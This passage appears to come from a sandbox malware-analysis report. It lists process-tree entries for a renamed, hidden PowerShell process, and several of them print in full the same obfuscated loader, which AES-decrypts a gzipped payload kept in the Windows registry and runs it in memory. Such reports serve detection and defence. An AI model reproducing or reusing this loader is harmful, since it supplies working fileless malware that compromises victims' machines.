[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:1608
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9528).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:8480
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "9528" "3184" "3104" "3188" "0" "0" "3192" "0" "0" "0" "0" "0"
        29⤵
        
        PID:7148
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        28⤵
        Hide Artifacts: Hidden Window
        
        PID:5240
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2844).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 